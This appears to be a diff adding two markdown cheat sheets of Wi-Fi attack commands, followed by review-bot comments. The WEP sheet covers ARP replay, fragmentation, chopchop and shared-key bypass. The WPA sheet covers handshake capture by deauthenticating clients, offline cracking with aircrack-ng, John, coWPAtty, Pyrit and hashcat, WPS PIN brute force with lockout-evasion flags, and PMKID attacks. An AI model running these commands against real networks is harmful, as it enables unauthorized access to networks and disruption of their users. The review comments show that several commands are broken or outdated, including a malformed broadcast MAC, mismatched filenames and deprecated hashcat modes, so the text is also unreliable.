|
||||||
|
|
||||||
|
> Attack the ACCESS POINT
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic
|
||||||
|
|
||||||
|
# Fake authentication for a more reliable attack
|
||||||
|
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# ARP replay attack
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# Deauthentication
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# Cracking
|
||||||
|
aircrack-ng arpreplay.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Interactive replay attack
|
||||||
|
|
||||||
|
> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic
|
||||||
|
|
||||||
|
# fake authentication for a more reliable attack
|
||||||
|
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# interactive replay attack (min arp 68, max arp 86)
|
||||||
|
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
|
||||||
|
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet
|
||||||
|
# Packet selection (ARP packets met the characteristics):
|
||||||
|
# - APs will always repeat packets destined to the broadcast
|
||||||
|
# - The packet will have the ToDS (To Distribution System) bit set to 1
|
||||||
|
# answer "y" multiple times
|
||||||
|
|
||||||
|
# cracking require ~> 250000 IVs
|
||||||
|
aircrack-ng -0 -z -n 64 clientwep-01.cap
|
||||||
|
* -z: PTW attack
|
||||||
|
* -n: number of bits in the WEP key
|
||||||
|
|
||||||
|
# backup file with an ARP packet
|
||||||
|
aireplay-ng -2 -r replay.cap mon0
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Cracking WEP without a Client
|
||||||
|
|
||||||
|
* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
|
||||||
|
* Need an AP configured with open system authentication
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client
|
||||||
|
|
||||||
|
# fake authentication attack with association timing (every 60s try to reassociate)
|
||||||
|
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
|
||||||
|
# -1 6000 to avoid a time out.
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Fragmentation attack
|
||||||
|
|
||||||
|
> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# attacker mac must be associated (fake auth)
|
||||||
|
# Press "Y"
|
||||||
|
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# use our PRGA from the fragmentation attack to generate an ARP request
|
||||||
|
# SRC_ADDR: 192.168.1.100
|
||||||
|
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
||||||
|
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
|
||||||
|
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
|
||||||
|
# -l: the source IP i.e. in ARP, this is "Tell this IP"
|
||||||
|
|
||||||
|
# check the packet
|
||||||
|
tcpdump -n -vvv -e -s0 -r inject.cap
|
||||||
|
|
||||||
|
# inject our crafted packet
|
||||||
|
aireplay-ng -2 -r inject.cap mon0
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
# Aircrack-ng will auto-update when new IVs are available
|
||||||
|
aircrack-ng -0 wepcrack
|
||||||
|
|
||||||
|
# if 64-bit WEP is used, cracking time < 5 minutes
|
||||||
|
# switch to 128-bit keys after 600000 IVs
|
||||||
|
# use the `-f 4` after 2000000
|
||||||
|
aircrack-ng -n 64 <capture filename>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### KoreK Chopchop attack
|
||||||
|
|
||||||
|
> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# chopchop attack: -4
|
||||||
|
# out decrypted: .cap
|
||||||
|
# out prga: .xor
|
||||||
|
# Press "Y" (choose a small packet)
|
||||||
|
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# check the packet and find the network addresses
|
||||||
|
tcpdump -n -vvv -e -s0 -r inject.cap
|
||||||
|
|
||||||
|
# use our PRGA from the fragmentation attack
|
||||||
|
# SRC_ADDR: 192.168.1.100
|
||||||
|
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
||||||
|
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap
|
||||||
|
|
||||||
|
# inject our crafted packet
|
||||||
|
aireplay-ng -2 -r chochop_out.cap mon0
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
aircrack-ng -0 wepcrack
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Bypassing WEP Shared Key Authentication SKA
|
||||||
|
|
||||||
|
> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
|
||||||
|
* Authentication: Shared Key
|
||||||
|
* When Fake Authentication => `AP rejects open-system authentication`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0
|
||||||
|
|
||||||
|
# deauthentication attack on the connected client
|
||||||
|
# airodump should display SKA under the AUTH column
|
||||||
|
# PRGA file will be saved as xxxx.xor
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# fake authentication attack with association timing (every 60s try to reassociate)
|
||||||
|
# should display switching to Shared Key Authentication
|
||||||
|
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
|
||||||
|
# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth
|
||||||
|
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# ARP replay attack
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# deauthentication attack on the connected client
|
||||||
|
# speed the ARP attack process using deauth
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
aircrack-ng sharedkey.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](TODO)
|
|
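Review bot: in "Interactive replay attack" the broadcast destination is malformed: `aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0` has five octets, while the next line correctly uses `FF:FF:FF:FF:FF:FF`. The "KoreK Chopchop attack" block reuses the fragmentation wording and filenames: the comment says `use our PRGA from the fragmentation attack` although the PRGA here comes from the chopchop run (`prga.xor`), `tcpdump -n -vvv -e -s0 -r inject.cap` inspects the fragmentation-attack file rather than the decrypted `.cap` the chopchop run wrote (which is the file the reader needs to pull IP addresses from), and `chochop_out.cap` is presumably `chopchop_out.cap`. In "Fragmentation attack" the blockquote runs two sentences together (`Goal: 1500 bytes of PRGA Atheros does not generate ...`). In "Cracking WEP without a Client" the comment `-1 6000 to avoid a time out.` sits under a line using `-1 60`; pick one value and explain that the number is the reassociation interval in seconds. In the SKA section the two `TO CHECK` lines use en-dashes (`aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0`, `aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon`), and it would help to state that airodump-ng must be running on the channel when the client reauthenticates, since that capture is what produces the `sharedkey.xor` PRGA file.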
@ -0,0 +1,220 @@
|
||||||
|
# Wifi - WPA Cracking
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite
|
||||||
|
* [bettercap/bettercap](https://github.com/bettercap/bettercap)
|
||||||
|
|
||||||
|
|
||||||
|
## WPA PSK Attack
|
||||||
|
|
||||||
|
### Cracking WPA with John the Ripper
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# crack without john the ripper (-b <BSSID>)
|
||||||
|
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
||||||
|
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
||||||
|
aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts
|
||||||
|
|
||||||
|
# crack with john the ripper - combine mangling rules with aircrack
|
||||||
|
# rules example to add in /pentest/passwords/john/john.conf
|
||||||
|
# $[0-9]$[0-9]
|
||||||
|
# $[0-9]$[0-9]$[0-9]
|
||||||
|
john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn
|
||||||
|
|
||||||
|
# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack
|
||||||
|
echo wifu > essid.txt
|
||||||
|
airolib-ng test.db --import essid essid.txt
|
||||||
|
airolib-ng test.db --stats
|
||||||
|
airolib-ng test.db --import passwd /pentest/passwords/john/password.lst
|
||||||
|
airolib-ng test.db --batch
|
||||||
|
airolib-ng test.db --stats
|
||||||
|
aircrack-ng -r test.db wpajohn-01.cap
|
||||||
|
# airolib-ng test.db --clean all
|
||||||
|
|
||||||
|
# Not in lab - Convert to hccap to use with John Jumbo
|
||||||
|
aircrack-ng <FileName>.cap -J <outFile>
|
||||||
|
hccap2john <outFile>.hccap > <JohnOutFile>
|
||||||
|
john <JohnOutFile>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cracking WPA with coWPAtty
|
||||||
|
|
||||||
|
> Better for PMK Rainbow table attacks
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# coWPAtty dictionary mode (slow)
|
||||||
|
cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID
|
||||||
|
|
||||||
|
# coWPAtty rainbow table mode (fast)
|
||||||
|
genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID
|
||||||
|
cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cracking WPA with Pyrit
|
||||||
|
|
||||||
|
> Can use GPU
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# clean the cap and extract only good packets
|
||||||
|
pyrit -r wpapyrit-01.cap analyze
|
||||||
|
pyrit -r wpapyrit-01.cap -o wpastripped.cap strip
|
||||||
|
|
||||||
|
# dictionary attack - slow ++
|
||||||
|
pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough
|
||||||
|
|
||||||
|
# pre-computed hashes attack - slow on CPU
|
||||||
|
pyrit eval # pwds in database
|
||||||
|
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
||||||
|
pyrit -e $AP_SSID create_essid
|
||||||
|
pyrit batch # generate
|
||||||
|
pyrit -r wpastripped.cap attack_db
|
||||||
|
|
||||||
|
# gpu power attack - fast on GPU
|
||||||
|
pyrit list_cores
|
||||||
|
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
||||||
|
pyrit -e $AP_SSID create_essid
|
||||||
|
pyrit batch
|
||||||
|
pyrit -r wpastripped.cap attack_db
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Cracking WPA with bettercap
|
||||||
|
|
||||||
|
* Install Bettercap
|
||||||
|
```powershell
|
||||||
|
# install and update
|
||||||
|
go get github.com/bettercap/bettercap
|
||||||
|
cd $GOPATH/src/github.com/bettercap/bettercap
|
||||||
|
make build && sudo make install
|
||||||
|
sudo bettercap -eval "caplets.update; q"
|
||||||
|
```
|
||||||
|
|
||||||
|
* Scan for Wifi networks
|
||||||
|
```ps1
|
||||||
|
# run and recon the wifi APs
|
||||||
|
sudo bettercap -iface wlan0
|
||||||
|
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
|
||||||
|
> wifi.recon on
|
||||||
|
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
|
||||||
|
> set wifi.show.sort clients desc
|
||||||
|
# every second, clear our view and present an updated list of nearby WiFi networks
|
||||||
|
> set ticker.commands 'clear; wifi.show'
|
||||||
|
> ticker on
|
||||||
|
# use the good channel
|
||||||
|
> wifi.recon.channel 1
|
||||||
|
```
|
||||||
|
|
||||||
|
* Execute the deauth attack
|
||||||
|
```powershell
|
||||||
|
# use the bssid of the AP
|
||||||
|
> wifi.deauth e0:xx:xx:xx:xx:xx
|
||||||
|
/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
|
||||||
|
/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## WPA WPS Attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0
|
||||||
|
airodump-ng mon0
|
||||||
|
|
||||||
|
# Install
|
||||||
|
apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
|
||||||
|
git clone https://github.com/t6x/reaver-wps-fork-t6x
|
||||||
|
apt-get install reaver
|
||||||
|
|
||||||
|
# Reaver integrated dumping tool (can also airodump-ng)
|
||||||
|
# Wash gives information about WPS being locked or not
|
||||||
|
# Locked WPS will have less success chances
|
||||||
|
wash -i mon0
|
||||||
|
|
||||||
|
# Launch Reaver
|
||||||
|
reaver -i mon0 -b $AP_MAC -vv -S
|
||||||
|
reaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S
|
||||||
|
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
|
||||||
|
|
||||||
|
|
||||||
|
# Now using pixiexps, you can crack PIN offline
|
||||||
|
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
|
||||||
|
# Then, you can use the PIN with reaver to get to cleartext password
|
||||||
|
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
|
||||||
|
|
||||||
|
|
||||||
|
# Some manufacturers have implemented protections
|
||||||
|
# You can try different switches to bypass
|
||||||
|
# -L = Ignore locked state
|
||||||
|
# -N = Don't send NACK packets when errors are detected
|
||||||
|
# -d = delay X seconds between PIN attempts
|
||||||
|
# -T = set timeout period to X second (.5 means half second)
|
||||||
|
# -r = After X attemps, sleep for Y seconds
|
||||||
|
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
|
||||||
|
```
|
||||||
|
|
||||||
|
> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far
|
||||||
|
|
||||||
|
|
||||||
|
## WPA PMKID Attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0
|
||||||
|
|
||||||
|
# PMKID capture
|
||||||
|
# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID.
|
||||||
|
# It can take a while to capture PKMID (several minutes++)
|
||||||
|
# We recommend running hcxdumptool up to 10 minutes before aborting.
|
||||||
|
# If an AP recieves our association request packet and supports sending
|
||||||
|
# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
|
||||||
|
PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)
|
||||||
|
echo $PMKID|grep 'FOUND PMKID' &> /dev/null
|
||||||
|
hcxpcaptool -z test.16800 test.pcapng
|
||||||
|
|
||||||
|
# Then convert the captured data to a suitable format for hashcat
|
||||||
|
# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
|
||||||
|
# -I retrieve identities from WiFi-traffic
|
||||||
|
# -U retrieve usernames from WiFi-traffic
|
||||||
|
# PMKID*MAC AP*MAC Station*ESSID
|
||||||
|
# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
|
||||||
|
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
|
||||||
|
|
||||||
|
# Cracking the HASH
|
||||||
|
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
|
||||||
|
hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt
|
||||||
|
|
||||||
|
# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
|
||||||
|
```
|
||||||
|
|
||||||
|
**Bettercap WPA - PMKID attack**
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
wifi.assoc all
|
||||||
|
/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
|
||||||
|
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](TODO)
|
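Review bot: the cracking commands in this file target formats hashcat has deprecated: `cap2hccapx ... bettercap-wifi-handshakes.hccapx` with `hashcat -m 2500`, and `hcxpcaptool -z test.16800 test.pcapng` with `hashcat -m 16800`, only work on older hashcat; current releases use `hcxpcapngtool -o hash.22000 capture.pcapng` and `hashcat -m 22000`, which takes both EAPOL handshakes and PMKIDs from one file. In "Cracking WPA with John the Ripper" the line `aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap` appears twice, and the pipe `john ... --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn` points at `/root/wpajohn` instead of the `wpajohn-01.cap` capture airodump-ng wrote. `go get github.com/bettercap/bettercap` no longer installs binaries on Go 1.18 and later; `go install github.com/bettercap/bettercap@latest` or the distro package is the current route. In the PMKID block `INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0` matches any `wlp*` line of ifconfig output rather than the monitor interface, `--enable_status=1` and `--enable_status --filtermode=2` are two spellings of the same hcxdumptool option, and hcxdumptool's flags changed substantially between major versions, so the version these lines were tested against should be stated. In the WPS block the `pixiewps -e <pke> -r <pkr> ...` values come from reaver's verbose output; in the t6x fork `-vvv` prints them and `-K 1` runs pixiewps automatically, which is simpler than copying them by hand. References is `[TODO](TODO)`.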